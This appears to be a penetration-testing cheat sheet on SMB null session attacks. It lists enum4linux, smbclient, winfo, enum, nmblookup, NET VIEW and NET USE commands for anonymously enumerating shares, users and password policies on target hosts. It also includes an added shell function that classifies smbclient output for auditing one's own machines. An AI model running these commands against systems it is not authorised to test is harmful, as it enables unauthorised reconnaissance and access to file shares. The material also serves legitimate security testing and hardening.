🎯 Null Session Attacks

Null Session Attack Tools

[1] enum4linux
[2] smbclient
[3] winfo
[4] enum
[5] NET USE

Enumeration using enum4linux

enum4linux -a <IP-Address>

enum4linux -n <IP-Address>

Notations

-a ==> Do all simple enumeration
-n ==> Do an nmblookup (similar to nbtstat)

Enumeration and Exploitation Using smbclient

Share enumeration can be performed using tools provided by the Samba suite. smbclient is an FTP-like client for accessing Windows shares; among other things, it can enumerate the shares provided by a host.

Command Example

smbclient -L //10.130.40.80 -N

Checking for Null Sessions with Linux

We can also perform the very same checks by using smbclient:

smbclient //10.130.40.80/IPC$ -N

smbclient //10.130.40.80/C$ -N

smbclient \\\\192.168.99.162\\WorkSharing -N

Useful smbclient Commands

smbclient -L WORKGROUP -I 192.168.99.162 -N -U ""
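
The smbclient -L ... -N check above is only useful once its output is interpreted. As an added example (not part of the original notes), the shell function below classifies that output when auditing your own hosts; the two sample outputs are constructed, and the function name and verdict strings are made up for this illustration.

```shell
#!/bin/sh
# Added example: classify the output of
#   smbclient -L //<host> -N
# for a hardening audit. Reads smbclient output on stdin, prints one verdict.
# Assumption: share names contain no spaces (rows are split on whitespace).

classify_null_session() {
    awk '
        /Anonymous login successful/              { anon = 1 }
        /NT_STATUS_(ACCESS_DENIED|LOGON_FAILURE)/ { denied = 1 }
        # Share table rows look like: <name> <Disk|IPC|Printer> [comment]
        $2 ~ /^(Disk|IPC|Printer)$/ {
            listed++
            if ($1 ~ /\$$/) admin++            # hidden/administrative share
            else exposed = exposed " " $1      # ordinary share visible anonymously
        }
        END {
            if (listed > admin)  print "NULL_SESSION_SHARES:" exposed
            else if (listed > 0) print "NULL_SESSION_ADMIN_ONLY"
            else if (anon)       print "NULL_SESSION_NO_LISTING"
            else if (denied)     print "DENIED"
            else                 print "UNKNOWN"
        }
    '
}

# Constructed sample: a host that accepts the anonymous bind and lists shares.
sample_open() { cat <<'EOF'
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	IPC$            IPC       Remote IPC
	C$              Disk      Default share
	WorkSharing     Disk
EOF
}

# Constructed sample: a host that refuses the anonymous session.
sample_denied() { cat <<'EOF'
session setup failed: NT_STATUS_ACCESS_DENIED
EOF
}

sample_open   | classify_null_session
sample_denied | classify_null_session
```

Against a real host the input would come from: smbclient -L //<IP-Address> -N 2>&1 | classify_null_session. Any verdict other than DENIED means the host answered an unauthenticated request and should be reviewed.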

Exploiting Null Sessions with winfo

Winfo is another command line utility we can use to automate null session exploitation. To use it, you just need to specify the target IP address and use the -n command line switch to tell the tool to use null sessions.

winfo is available in packetstorm

Basic Command Syntax

winfo <ip-address> -n

Notation

Exploiting Null Sessions with enum

** Please Note ** It will note administrative shares too.

enum is available in packetstorm

enum -S <ip-address>

enum -U <ip-address>

enum -P <ip-address>

Notations

Enumerate Using nmblookup

To perform the same operations as nbtstat, we can use nmblookup with the same command line switch:

Command Syntax

nmblookup -A <target-IP-Address>

Enumerate using NET VIEW

Once an attacker knows that a machine has the File Server service running, they can enumerate the shares by using the NET VIEW command.

Command Syntax

NET VIEW <target-IP>

Checking Null Sessions with Windows

To connect, we have to type the following command in a Windows shell:

NET USE \\<target-IP-address>\IPC$ "" /u:""

This tells Windows to connect to the IPC$ share by using an empty password and an empty username!
